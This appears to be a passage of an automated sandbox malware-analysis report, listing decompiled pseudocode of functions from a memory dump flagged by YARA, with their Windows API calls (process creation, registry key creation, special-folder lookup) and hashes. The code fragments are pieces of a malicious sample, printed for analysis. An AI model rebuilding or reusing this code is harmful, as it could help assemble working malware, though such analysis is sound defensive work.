				 *((intOrPtr*)( *_t40 + 0x20)) =  *((char*)(_t134 + _t188));
				_t195 =  *((intOrPtr*)(_t134 + _t188 + 1));
				_t189 = _t188 + 5;
				_t112 = E00413441(_t134 + _t189, _t195); // executed
				_t47 =  &_v8; // 0x41562e
				E00403549( *_t47 + 0x24, _t112); // executed
				E00405FEB(_v12);
				_t190 = _t189 + _t195;
				_t51 =  &_v8; // 0x41562e
				_t196 =  *_t51;
				 *((intOrPtr*)(_t196 + 0x2c)) =  *((intOrPtr*)(_t134 + _t190));
				 *((intOrPtr*)(_t196 + 0x34)) =  *((char*)(_t134 + _t190 + 4));
				 *((intOrPtr*)(_t196 + 0x38)) =  *((char*)(_t134 + _t190 + 5));
				 *((intOrPtr*)(_t196 + 0x3c)) =  *((char*)(_t134 + _t190 + 6));
				 *((intOrPtr*)(_t196 + 0x40)) =  *((char*)(_t134 + _t190 + 7));
				 *((intOrPtr*)(_t196 + 0x44)) =  *((char*)(_t134 + _t190 + 8));
				 *((intOrPtr*)(_t196 + 0x48)) =  *((char*)(_t134 + _t190 + 9));
				E00413441(_t134 + 4 + _t190 + 0xa,  *((intOrPtr*)(_t134 + _t190 + 0xa))); // executed
				_t74 =  &_v8; // 0x41562e
				E00403549(_t196 + 0x30, _t74);
				_t76 =  &_v8; // 0x41562e
				 *_t196 = 1;
				 *((intOrPtr*)(_t196 + 4)) = 1;
				E00405FEB( *_t76);
				E00403148( &_v24);
				E00403148( &_v108);
				_t173 = _v56;
				if(_v56 != 0) {
					E00401EB2(_t173, _t173);
				}
				_v56 = 0;
				_v48 = 0;
				_v52 = 0;
				E00403148( &_v76);
				return E0041140C( &_v100, 0);
			}


































                                  0x00405b4e
                                  0x00405b5a
                                  0x00405b61
                                  0x00405b64
                                  0x00405b6d
                                  0x00405b7b
                                  0x00405b88
                                  0x00405b98
                                  0x00405ba0
                                  0x00405bac
                                  0x00405bb8
                                  0x00405bc0
                                  0x00405bcb
                                  0x00405bd0
                                  0x00405bd6
                                  0x00405bdc
                                  0x00405be6
                                  0x00405bee
                                  0x00405bf3
                                  0x00405bf6
                                  0x00405bf6
                                  0x00405bfc
                                  0x00405c02
                                  0x00405c06
                                  0x00405c0d
                                  0x00405c13
                                  0x00405c1a
                                  0x00405c22
                                  0x00405c27
                                  0x00405c2a
                                  0x00405c30
                                  0x00405c36
                                  0x00405c3a
                                  0x00405c41
                                  0x00405c47
                                  0x00405c4e
                                  0x00405c56
                                  0x00405c5b
                                  0x00405c5e
                                  0x00405c64
                                  0x00405c6a
                                  0x00405c6e
                                  0x00405c75
                                  0x00405c7b
                                  0x00405c82
                                  0x00405c8a
                                  0x00405c8f
                                  0x00405c94
                                  0x00405c94
                                  0x00405c9d
                                  0x00405ca5
                                  0x00405cad
                                  0x00405cb5
                                  0x00405cbd
                                  0x00405cc5
                                  0x00405cd0
                                  0x00405cd8
                                  0x00405cde
                                  0x00405ce5
                                  0x00405cea
                                  0x00405cf0
                                  0x00405cf2
                                  0x00405cf5
                                  0x00405cfd
                                  0x00405d05
                                  0x00405d0a
                                  0x00405d0f
                                  0x00405d12
                                  0x00405d12
                                  0x00405d1c
                                  0x00405d1f
                                  0x00405d22
                                  0x00405d25
                                  0x00405d36

                                  APIs
                                  • Sleep.KERNEL32(000001F4,00000000,74A313FB,00000000), ref: 00405B64
                                    • Part of subcall function 004034D1: lstrlenA.KERNEL32(?,74A313FB,?,00405B8D,.bss,00000000), ref: 004034DA
                                    • Part of subcall function 004034D1: lstrlenA.KERNEL32(?,?,00405B8D,.bss,00000000), ref: 004034E7
                                    • Part of subcall function 004034D1: lstrcpyA.KERNEL32(00000000,?,?,00405B8D,.bss,00000000), ref: 004034FA
                                    • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                    • Part of subcall function 00403549: lstrcpyW.KERNEL32(00000000,00000000), ref: 0040356E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpylstrlen$FreeSleepVirtual
                                  • String ID: .VA$.bss
                                  • API String ID: 277671435-4282314365
                                  • Opcode ID: ae73d4eeeba3edb545db3ca4ca3ae1908409e79bf949f37c4c4939552442591e
                                  • Instruction ID: d77f0bc86c0f0e09d154f713c611f4ee480ed774d1177d5a26b30425dba20ef3
                                  • Opcode Fuzzy Hash: ae73d4eeeba3edb545db3ca4ca3ae1908409e79bf949f37c4c4939552442591e
                                  • Instruction Fuzzy Hash: 8C516671900519AFCB15EFA1C8D18EEBBB9EF44308B1041BEE406AB296DF34AB45CF54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004031AF, Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 53COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 91%
                                  			E004031AF(char** __ecx, void* __eflags, intOrPtr* _a4) {
				char** _v8;
				short* _t15;
				void* _t19;
				int _t39;

				_push(__ecx);
				_v8 = __ecx;
				 *_a4 = 0;
				if(E0040319E(__ecx) > 0) {
					_t39 = MultiByteToWideChar(0, 2,  *__ecx, E0040319E(__ecx) + 2, 0, 0) + _t14;
					_t15 = E00405F68(_t39);
					_t26 = _t15;
					E0040319E(_v8);
					MultiByteToWideChar(0xfde9, 0,  *_v8, 0xffffffff, _t15, _t39);
					_t19 = E004036F7( &_v8, _t15); // executed
					E00403549(_a4, _t19); // executed
					E00405FEB(_v8);
					E00405FEB(_t26);
				}
				return _a4;
			}







                                  0x004031b2
                                  0x004031bc
                                  0x004031bf
                                  0x004031c8
                                  0x004031e4
                                  0x004031e8
                                  0x004031f0
                                  0x004031f2
                                  0x00403207
                                  0x00403211
                                  0x0040321a
                                  0x00403222
                                  0x00403229
                                  0x00403229
                                  0x00403234

                                  APIs
                                    • Part of subcall function 0040319E: lstrlenA.KERNEL32(00000000,004031C6,74A313FB,00000000,00000000, 6@,004033EE, 6@,00000000,-00000001,74A313FB,?,00403620,00000000,?,?), ref: 004031A5
                                  • MultiByteToWideChar.KERNEL32(00000000,00000002,00000000,-00000002,00000000,00000000,74A313FB,00000000,00000000, 6@,004033EE, 6@,00000000,-00000001,74A313FB), ref: 004031DC
                                    • Part of subcall function 00405F68: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,?,004034F4,?,00405B8D,.bss,00000000), ref: 00405F76
                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,?,00403620,00000000,?,?,74A313FB,00000000), ref: 00403207
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                    • Part of subcall function 004036F7: lstrcpyW.KERNEL32(?,00413483), ref: 00403732
                                    • Part of subcall function 00403549: lstrcpyW.KERNEL32(00000000,00000000), ref: 0040356E
                                    • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: lstrlen$ByteCharMultiVirtualWidelstrcpy$AllocFree
                                  • String ID: 6@
                                  • API String ID: 4006399363-952913687
                                  • Opcode ID: 2b79037b742289ec2611566c79040ddf19f25a4ef00d7f821399da99d6758848
                                  • Instruction ID: d9978922c9701d3022712c3417eb10aadbb871c603d42485b42bce1279e5fb8f
                                  • Opcode Fuzzy Hash: 2b79037b742289ec2611566c79040ddf19f25a4ef00d7f821399da99d6758848
                                  • Instruction Fuzzy Hash: EB019231600114BBCB14EFA6CC86D9E3AADDF09759B00007AF502AB3D1CA788E0087A8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004120F8, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42processCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E004120F8(void** __ecx, void* __eflags, WCHAR** _a4, WCHAR** _a8) {
				struct _PROCESS_INFORMATION _v20;
				struct _STARTUPINFOW _v88;
				int _t12;
				void** _t22;

				_t22 = __ecx;
				E00401052( &_v88, 0, 0x44);
				_v88.cb = 0x44;
				_t12 = CreateProcessW( *_a4,  *_a8, 0, 0, 0, 0, 0, 0,  &_v88,  &_v20); // executed
				if(_t12 == 0) {
					return 0;
				}
				 *_t22 = _v20.hProcess;
				return 1;
			}







                                  0x00412109
                                  0x0041210b
                                  0x00412119
                                  0x00412133
                                  0x0041213b
                                  0x00000000
                                  0x00412147
                                  0x00412140
                                  0x00000000

                                  APIs
                                  • CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 00412133
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CreateProcess
                                  • String ID: D
                                  • API String ID: 963392458-2746444292
                                  • Opcode ID: 806a1345995c658448e08c7749a84233f626c00a79c6c3af5016fe5ec34afd3a
                                  • Instruction ID: 7316dee4d5838358630adf92f0372be6f077b375a233667746e950a813593388
                                  • Opcode Fuzzy Hash: 806a1345995c658448e08c7749a84233f626c00a79c6c3af5016fe5ec34afd3a
                                  • Instruction Fuzzy Hash: 87F030B6600249AFDB00DFE4DD81DEB77BDEB44348B008439E64ADB250E6B49D18C765
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004109A0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 89%
                                  			E004109A0() {
				char _v8;
				void* __ecx;
				WCHAR* _t3;
				void* _t5;
				signed int* _t10;
				long _t15;
				signed int* _t16;
				intOrPtr* _t21;

				_push(_t10);
				_t16 = _t10;
				_t3 = E00401085(0x7d0);
				 *_t16 =  *_t16 & 0x00000000;
				_t19 = _t3;
				 *_t21 = 0x3e8;
				GetModuleFileNameW(0, _t3, _t15);
				_t5 = E004036F7( &_v8, _t19); // executed
				E00403549(_t16, _t5); // executed
				E00405FEB(_v8);
				E00401099(_t19);
				return _t16;
			}











                                  0x004109a3
                                  0x004109ab
                                  0x004109ad
                                  0x004109b2
                                  0x004109b5
                                  0x004109b7
                                  0x004109c1
                                  0x004109cb
                                  0x004109d3
                                  0x004109db
                                  0x004109e1
                                  0x004109ec

                                  APIs
                                    • Part of subcall function 00401085: GetProcessHeap.KERNEL32(00000000,?,004134B7,00400000,?,?,00000000,?,?,00415553), ref: 0040108B
                                    • Part of subcall function 00401085: RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,?,00415553), ref: 00401092
                                  • GetModuleFileNameW.KERNEL32(00000000,00000000,000007D0,?,00000000,?VA,?,00412BF1,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows NT\CurrentVersion\Windows,00000000,InitWindows), ref: 004109C1
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                    • Part of subcall function 004036F7: lstrcpyW.KERNEL32(?,00413483), ref: 00403732
                                    • Part of subcall function 00403549: lstrcpyW.KERNEL32(00000000,00000000), ref: 0040356E
                                    • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                    • Part of subcall function 00401099: GetProcessHeap.KERNEL32(00000000,00000000,00413499,00000000,00000000,00000000,00000000,.bss,00000000), ref: 0040109F
                                    • Part of subcall function 00401099: HeapFree.KERNEL32(00000000), ref: 004010A6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$FreeProcesslstrcpylstrlen$AllocateFileModuleNameVirtual
                                  • String ID: ?VA
                                  • API String ID: 258861418-1028452459
                                  • Opcode ID: 5e9790b0f14f75e7de37d6df4a049945b021b0a9b244203bc4b82d125c1b0ceb
                                  • Instruction ID: a8e575aaac2c0b60fdd0bfa417f7cf0f615c7bb468fc2b6995dd3cebff2648c5
                                  • Opcode Fuzzy Hash: 5e9790b0f14f75e7de37d6df4a049945b021b0a9b244203bc4b82d125c1b0ceb
                                  • Instruction Fuzzy Hash: 5AE06D626042107BD214B767EC17FAF3AADCF8136AF00003EF545A62D1DEB85A0086A8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00403447, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 25stringCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00403447(WCHAR** __ecx, void* __eflags, WCHAR** _a4) {
				void* _t4;
				WCHAR* _t6;
				WCHAR** _t8;
				WCHAR** _t14;

				_t14 = _a4;
				_t8 = __ecx;
				_t4 = E00403373(_t14);
				_t6 = E00405F8C( *((intOrPtr*)(__ecx)), 4 + (_t4 + E00403373(__ecx)) * 2); // executed
				 *_t8 = _t6;
				return lstrcatW(_t6,  *_t14);
			}







                                  0x0040344d
                                  0x00403450
                                  0x00403454
                                  0x0040346d
                                  0x00403472
                                  0x00403481

                                  APIs
                                    • Part of subcall function 00403373: lstrlenW.KERNEL32(74A313FB,00403758,?,?,?,00412AE3,?,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,?VA,00000000,74A313FB,00000000), ref: 0040337A
                                  • lstrcatW.KERNEL32 ref: 00403477
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcatlstrlen
                                  • String ID: ?VA
                                  • API String ID: 1475610065-1028452459
                                  • Opcode ID: 2f3517887fd5a0b623de7eb871a814aad56a43f5e694413d6d57f4bdb99eb0b7
                                  • Instruction ID: 49b9b30c5e13f085cb611e028f6c6d6892849633b3b038c637a710d95911752b
                                  • Opcode Fuzzy Hash: 2f3517887fd5a0b623de7eb871a814aad56a43f5e694413d6d57f4bdb99eb0b7
                                  • Instruction Fuzzy Hash: 02E0D8327042105BCB106B66D8C496E7B5DEF853A0704043AF90597250DE785C0096E8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00403666, Relevance: 3.1, APIs: 2, Instructions: 54COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 91%
                                  			E00403666(short** __ecx, intOrPtr _a4) {
				short** _v8;
				char* _t12;
				void* _t15;
				int _t35;
				short** _t36;

				_push(__ecx);
				_v8 = __ecx;
				E004032D5(_a4);
				if( *__ecx != 0) {
					_t35 = WideCharToMultiByte(0, 0x200,  *__ecx, E00403373(__ecx), 0, 0, 0, 0);
					_t12 = E00405FFA(_t35);
					_t36 = _v8;
					_t22 = _t12;
					WideCharToMultiByte(0xfde9, 0,  *_t36, E00403373(_t36), _t12, _t35, 0, 0);
					_t15 = E004034D1( &_v8, _t22); // executed
					E00403237(_a4, _t15); // executed
					E00405FEB(_v8);
					E00405FEB(_t22);
				}
				return _a4;
			}








                                  0x00403669
                                  0x00403671
                                  0x00403674
                                  0x0040367d
                                  0x00403699
                                  0x0040369d
                                  0x004036a7
                                  0x004036aa
                                  0x004036be
                                  0x004036c8
                                  0x004036d1
                                  0x004036d9
                                  0x004036e0
                                  0x004036e0
                                  0x004036eb

                                  APIs
                                    • Part of subcall function 00403373: lstrlenW.KERNEL32(74A313FB,00403758,?,?,?,00412AE3,?,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,?VA,00000000,74A313FB,00000000), ref: 0040337A
                                  • WideCharToMultiByte.KERNEL32(00000000,00000200,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00404FB1,?), ref: 00403693
                                    • Part of subcall function 00405FFA: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,00403764,?,?,?,00412AE3,?,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,?VA,00000000,74A313FB,00000000), ref: 00406004
                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00404FB1,?,?,?,?,?,00000000), ref: 004036BE
                                    • Part of subcall function 004034D1: lstrlenA.KERNEL32(?,74A313FB,?,00405B8D,.bss,00000000), ref: 004034DA
                                    • Part of subcall function 004034D1: lstrlenA.KERNEL32(?,?,00405B8D,.bss,00000000), ref: 004034E7
                                    • Part of subcall function 004034D1: lstrcpyA.KERNEL32(00000000,?,?,00405B8D,.bss,00000000), ref: 004034FA
                                    • Part of subcall function 00403237: lstrcatA.KERNEL32(00000000,74A313FB,?,00000000,?,004036D6,00000000,00000000,?,00404FB1,?,?,?,?,?,00000000), ref: 00403263
                                    • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: lstrlen$ByteCharMultiVirtualWide$AllocFreelstrcatlstrcpy
                                  • String ID:
                                  • API String ID: 346377423-0
                                  • Opcode ID: 33dd4bd5d87851eb0de9a761e9b01817b2e54de34538e841d73ad23b70dc114d
                                  • Instruction ID: c7d19490b4b7bf55ff7d061cd44103b5bbdd205034f2344246e6d9ab79f340c2
                                  • Opcode Fuzzy Hash: 33dd4bd5d87851eb0de9a761e9b01817b2e54de34538e841d73ad23b70dc114d
                                  • Instruction Fuzzy Hash: 5C014071301624BBDB15AFA5CC86EEE7A6D9F09755F10007AB906BB2C1CE785E0097A8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041338D, Relevance: 3.0, APIs: 2, Instructions: 14sleepCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0041338D(signed int _a4) {

				Sleep(1); // executed
				return GetTickCount() * (1 + _a4 * 0x359) % 0x2710;
			}



                                  0x00413392
                                  0x004133b5

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CountSleepTick
                                  • String ID:
                                  • API String ID: 2804873075-0
                                  • Opcode ID: 62ba6aea4ccaa183db535f1184d9731aabb142e05b2b2deef58fc80dffe5c418
                                  • Instruction ID: cb4e42e87864ed722aedde75ee5ec1912828b431a3830261680a48f961af466f
                                  • Opcode Fuzzy Hash: 62ba6aea4ccaa183db535f1184d9731aabb142e05b2b2deef58fc80dffe5c418
                                  • Instruction Fuzzy Hash: EDD0123035C104AFE30C9B59FC5E7A57A6ED7D5705F04C03BF60EC92E1C9B195554598
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004117A2, Relevance: 3.0, APIs: 2, Instructions: 8synchronizationCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E004117A2(void** __ecx) {
				int _t2;
				void** _t4;

				_t4 = __ecx;
				ReleaseMutex( *__ecx);
				_t2 = CloseHandle( *_t4); // executed
				return _t2;
			}





                                  0x004117a3
                                  0x004117a7
                                  0x004117af
                                  0x004117b6

                                  APIs
                                  • ReleaseMutex.KERNEL32(?,?,0041141C,.VA,00405D32,.VA,00000000,00000000,00000000,00000000,?,?,?,?,00000000,.bss), ref: 004117A7
                                  • CloseHandle.KERNEL32(?), ref: 004117AF
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CloseHandleMutexRelease
                                  • String ID:
                                  • API String ID: 4207627910-0
                                  • Opcode ID: 9070c27b8a4b9f148fcf1c292b5093e63aa80bcd4563dcd4d2d625aad2e24fc1
                                  • Instruction ID: da85866315e866d9b3d8c4bbf16f7db246e1d0e2a6d46926b2ed1ada722145db
                                  • Opcode Fuzzy Hash: 9070c27b8a4b9f148fcf1c292b5093e63aa80bcd4563dcd4d2d625aad2e24fc1
                                  • Instruction Fuzzy Hash: FFB0923A009020EFEB222F14FC0C8C4BBB5EF0925131185BAF08182138CBB20C519B94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00401085, Relevance: 3.0, APIs: 2, Instructions: 6memoryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00401085(long _a4) {
				void* _t3;

				_t3 = RtlAllocateHeap(GetProcessHeap(), 0, _a4); // executed
				return _t3;
			}




                                  0x00401092
                                  0x00401098

                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,?,004134B7,00400000,?,?,00000000,?,?,00415553), ref: 0040108B
                                  • RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,?,00415553), ref: 00401092
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateProcess
                                  • String ID:
                                  • API String ID: 1357844191-0
                                  • Opcode ID: 361bd0a745674208a41a1b438dab8da89b21d4b91da0fe10cf2071da8b51176b
                                  • Instruction ID: edbd1dd06743cb7a1a2c428d36d16fad14126cf83079969d3a169869f5bf1203
                                  • Opcode Fuzzy Hash: 361bd0a745674208a41a1b438dab8da89b21d4b91da0fe10cf2071da8b51176b
                                  • Instruction Fuzzy Hash: 06B00275558200ABDE516BA09F0DB597A75AB48702F048594B24585060C77544519B66
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00406034, Relevance: 2.5, APIs: 2, Instructions: 6memoryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00406034(void* __ecx) {
				int _t2;

				_t2 = HeapFree(GetProcessHeap(), 0, __ecx); // executed
				return _t2;
			}




                                  0x0040603e
                                  0x00406044

                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,?,00403156,?,00405D68,00000000,?,00412694,?,?,0041577A), ref: 00406037
                                  • HeapFree.KERNEL32(00000000), ref: 0040603E
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$FreeProcess
                                  • String ID:
                                  • API String ID: 3859560861-0
                                  • Opcode ID: 23d5df900dac21bab6a333045b0a5e3ddfb1a785034aa4cb4a057aa396afd6b2
                                  • Instruction ID: 97b5132d47626f22dbbfebbef4f37b02692f87ed7e1fea3e09d59c323e792602
                                  • Opcode Fuzzy Hash: 23d5df900dac21bab6a333045b0a5e3ddfb1a785034aa4cb4a057aa396afd6b2
                                  • Instruction Fuzzy Hash: 27A002719682009BDE5467B09E0DB563939A748702F048554B20985151D67454018675
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00414C38, Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 87%
                                  			E00414C38(void* __ecx) {
				void* _t22;
				intOrPtr* _t32;
				intOrPtr* _t33;
				intOrPtr* _t34;
				intOrPtr* _t37;
				void* _t42;

				_t42 = __ecx;
				_t32 =  *((intOrPtr*)(__ecx + 0x34));
				if(_t32 != 0) {
					 *((intOrPtr*)( *_t32 + 0x24))(_t32);
				}
				_t33 =  *((intOrPtr*)(_t42 + 0x34));
				if(_t33 != 0) {
					 *((intOrPtr*)( *_t33 + 8))(_t33);
					 *((intOrPtr*)(_t42 + 0x34)) = 0;
				}
				_t34 =  *((intOrPtr*)(_t42 + 0x18));
				if(_t34 != 0) {
					 *((intOrPtr*)( *_t34 + 8))(_t34);
					 *((intOrPtr*)(_t42 + 0x18)) = 0;
				}
				E00402562(_t42 + 0x1c);
				E00402562(_t42 + 0x20);
				_t37 =  *((intOrPtr*)(_t42 + 0x24));
				if(_t37 != 0) {
					 *((intOrPtr*)( *_t37 + 8))(_t37);
					 *((intOrPtr*)(_t42 + 0x24)) = 0;
				}
				E00402562(_t42 + 0x28);
				E00402562(_t42 + 0x2c);
				_t22 = E00402562(_t42 + 0x30);
				 *((intOrPtr*)(_t42 + 0x34)) = 0;
				__imp__CoUninitialize(); // executed
				return _t22;
			}









                                  0x00414c39
                                  0x00414c3c
                                  0x00414c41
                                  0x00414c46
                                  0x00414c46
                                  0x00414c49
                                  0x00414c50
                                  0x00414c55
                                  0x00414c58
                                  0x00414c58
                                  0x00414c5b
                                  0x00414c60
                                  0x00414c65
                                  0x00414c68
                                  0x00414c68
                                  0x00414c6e
                                  0x00414c76
                                  0x00414c7b
                                  0x00414c80
                                  0x00414c85
                                  0x00414c88
                                  0x00414c88
                                  0x00414c8e
                                  0x00414c96
                                  0x00414c9e
                                  0x00414ca3
                                  0x00414ca6
                                  0x00414cae

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Uninitialize
                                  • String ID:
                                  • API String ID: 3861434553-0
                                  • Opcode ID: f409e6eadb3aaa3bb9f8bd5a13b75d6ab8235dd759573a421781aaf34dc19ad9
                                  • Instruction ID: 5160318e26e57bbb59a4e031077ca80efc8ba31f4ff7defc0b7589d9c5b86bff
                                  • Opcode Fuzzy Hash: f409e6eadb3aaa3bb9f8bd5a13b75d6ab8235dd759573a421781aaf34dc19ad9
                                  • Instruction Fuzzy Hash: DC012E752027008BC328DF36C698866B7F4BF94700301092EA48787AA1DB35F941CA48
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00410C8A, Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 58%
                                  			E00410C8A(WCHAR** __ecx, void* __edx, void* __eflags) {
				char _v524;
				WCHAR** _t13;
				void* _t14;

				_t14 = __edx;
				_t13 = __ecx;
				E00401052( &_v524, 0, 0x208);
				__imp__SHGetSpecialFolderPathW(0,  &_v524, _t14, 0); // executed
				E004036F7(_t13,  &_v524); // executed
				return _t13;
			}






                                  0x00410ca3
                                  0x00410ca5
                                  0x00410ca7
                                  0x00410cbb
                                  0x00410cca
                                  0x00410cd4

                                  APIs
                                  • SHGetSpecialFolderPathW.SHELL32(00000000,?,?,00000000), ref: 00410CBB
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                    • Part of subcall function 004036F7: lstrcpyW.KERNEL32(?,00413483), ref: 00403732
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: lstrlen$FolderPathSpeciallstrcpy
                                  • String ID:
                                  • API String ID: 1680175942-0
                                  • Opcode ID: 5b2eee6966b55b0b689df07c47954d9a079f2730c76c384eb967d1f6a3990424
                                  • Instruction ID: cf24a81cd299cbc4f05302b0a76130d0710c8618247d4c3c57238b1560f083e9
                                  • Opcode Fuzzy Hash: 5b2eee6966b55b0b689df07c47954d9a079f2730c76c384eb967d1f6a3990424
                                  • Instruction Fuzzy Hash: 6BE0D875B0031837DB70A6169C0EFC73A6CCBC0715F0001B2BA58E32D1ED74EA45C6A4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00412514, Relevance: 1.5, APIs: 1, Instructions: 28registryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 79%
                                  			E00412514(void** __ecx, short** _a8) {
				int _v8;
				signed int _t8;

				_push(__ecx);
				_v8 = 0;
				_t8 = RegCreateKeyExW(0x80000001,  *_a8, 0, 0, 1, 1, 0, __ecx,  &_v8); // executed
				if(_t8 != 0) {
					return 0;
				}
				return (_t8 & 0xffffff00 | _v8 == 0x00000001) + 1;
			}





                                  0x00412517
                                  0x0041252c
                                  0x00412534
                                  0x0041253d
                                  0x00000000
                                  0x00412549
                                  0x00000000

                                  APIs
                                  • RegCreateKeyExW.KERNEL32(80000001,00000000,00000000,00000000,00000001,00000001,00000000,?,00000000,74A313FB,?,?,0041270B,?,?), ref: 00412534
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Create
                                  • String ID:
                                  • API String ID: 2289755597-0
                                  • Opcode ID: 5228ff0b190b937b08b73a2a7384eafff423ad1fc8258efa1007a891bcb9c750
                                  • Instruction ID: 6b4a3946c2a43bcd037634b81ad519b7cc297f2607030efe808653eea7f4a6e3
                                  • Opcode Fuzzy Hash: 5228ff0b190b937b08b73a2a7384eafff423ad1fc8258efa1007a891bcb9c750
                                  • Instruction Fuzzy Hash: DCE0D832515325FFDB208B528D48ECB7F7DDB057E4F008115F509D2150D2B18640D5F4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004032E6, Relevance: 1.5, APIs: 1, Instructions: 27COMMON
